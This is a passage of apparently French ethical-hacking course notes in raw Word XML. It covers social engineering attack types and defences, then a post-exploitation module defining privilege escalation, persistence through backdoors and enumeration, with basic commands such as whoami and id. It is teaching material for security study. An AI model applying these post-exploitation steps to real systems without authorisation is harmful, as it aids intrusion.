      <w:bookmarkStart w:id="112" w:name="_cu9lh7fut5a3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Qu’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>est ce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> que l’ingénierie sociale ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DD7E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="335FABD4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Une technique de manipulation utilisée par les cybercriminels pour inciter les gens à partager des infos confidentielles. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FBCBA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26082E2C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Elle mise sur l'instinct fondamental de l’être humain à faire confiance pour voler des infos perso et corporatives qui peuvent ensuite être utilisées pour commettre d’autres cybercrimes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0188A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0A1A35B6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2A8B36D9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_czkp2ej64pb3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="113"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Les attaques les plus fréquentes utilisant l’ingénierie sociale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C3F15C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2D0F17B0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hameçonage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C766E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Harponnage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74283C57" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’appât : en ligne ou dans un lieu physique (criminel promet une récompense en échange d’infos sensibles ou de la connaissance de sa localisation) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469FC267" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logiciel Malveillant </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1B95D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prétexte : prend une fausse identité pour inciter ses victimes à communiquer des infos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49611DB8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’échange de biens ou de services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDFC47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Talonnage (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ex:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>servire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de quelqu’un suivre une personne alors qu’on a pas de badge) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8400DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">L'hameçonnage vocal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F220CA8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L’attaque de point d’eau : Une attaque de point d'eau est une technique de cyberattaque qui consiste à piéger un site Internet légitime afin d’infecter les machines des visiteurs du domaine considéré comme la cible par l’attaquant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784C51EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F033EA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740455AC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_vux7imuyhdvq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Les faiblesses de l’être humain exploitées par l’ingénierie social</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65579421" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6BDA9E83" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La peur (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ex:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je vais faire du mal à ta famille)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFF057" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’avidité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4110C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La curiosité (les cybercriminels prêtent attention aux événements qui font l’objet d’une grande couverture médiatique et profitent ensuite de la curiosité humaine pour inciter leurs victimes à compléter certaines actions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FED23A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’entraide </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3BEE1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’Urgence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EA657" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3B5020F6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_faxegn5wk8n4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment se prémunir de ces attaques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D508B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D7896F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installer un logiciel antivirus de confiance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C05637" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifier les paramètres de gestion des spams </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B87597" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Changer régulièrement les mots de passe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083F422" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vérifier les sources avant de cliquer sur un lien, mails, fichiers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61395A65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="704DCEAC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="73FE9D0F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="09DC3CF7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="611B9496" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A7A91F" w14:textId="05824F37" w:rsidR="00223B72" w:rsidRPr="00534394" w:rsidRDefault="00000000" w:rsidP="00534394">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_k92ico76p7jw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules 14 - Post-exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FE2C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_xw6cnqcj212n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 - Définition </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747ACD71" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="26286542" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Le terme post-exploitation fait référence aux actions effectuées une fois que l’on a obtenu un certain niveau d’accès au système cible. Les actions de post-exploitations sont : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C15C88" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7307B926" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'élévation des privilèges : droits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A56EECE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les mouvements latéraux : déplacements sur le réseau (aller d’une machine à l’autre) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413FC06" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La persistance : activation de porte dérobée </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB84BF1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumération : récupération d'informations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32464D9E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1C83E9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_70k78snkm866" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapitre 2 - Elévation de privilèges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD4F7F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2EDF8A6A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>L'élévation des privilèges implique de passer un compte avec des autorisations inférieur à un compte avec des autorisations supérieures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CDBEBA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="001AC495" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L'élévation des privilèges est </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>crucial</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> car cela permet d'obtenir des niveaux d’accès d’admin pour effectuer des actions telles que : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF447E5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Réinitialiser le mdp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76E5C6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Contourner les contrôles d’accès pour compromettre les données protégées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59AD07" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Modification des config logicielles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4FC60D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Activer la persistance </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( activer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> une porte dérobée) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DB8C4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifier le privilège des utilisateurs existants (ou nouveaux) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55FB17" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="568E6A8F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="309ADB8C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_b69f8ad2y066" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 - Enumération </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE55D68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5D3D2690" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L’énumération est un processus qui consiste à accéder aux services qui tournent derrière les ports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ouverts,découverts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lors du scanning afin d’obtenir plus d’infos sur la cible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD3C9B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="470AB510" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">La phase d'énumération permet d’accéder à l'environnement Intranet d’un système cible afin d’obtenir des infos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sur  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D10DD8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les ressources du réseau et partages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0CC193" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et les groupe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B27C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les tables de routage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0E62A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Le noms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> des machines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EAA4F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les détails SNMP et DNS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC65031" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les mots de passe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF732C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1AF223D9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5655EC89" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_m7hyyw2qd8bv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="39602028" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_rms9bgk2ny" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>1 - L’énumération des utilisateurs et des comptes utilisateurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE76F3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> après avoir accéder à la cible, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la première choses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est d’identifier le contexte de l’utilisateur </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E608A5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="33E6568B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Afficher le nom d’utilisateur -&gt; Commande sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et linux : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2692D99B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7423F9B3" wp14:editId="232F4DED">
            <wp:extent cx="1657350" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1657350" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="68CD4759" wp14:editId="263721C3">
            <wp:extent cx="2905125" cy="561975"/>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2905125" cy="561975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2D13E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="691231BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7A0AB696" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="080B88AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3D869216" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6E9F35E6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6CE3A593" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7453DD54" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Information de contexte sur l’utilisateur -&gt; Commande sous linux : id</w:t>
      </w:r>
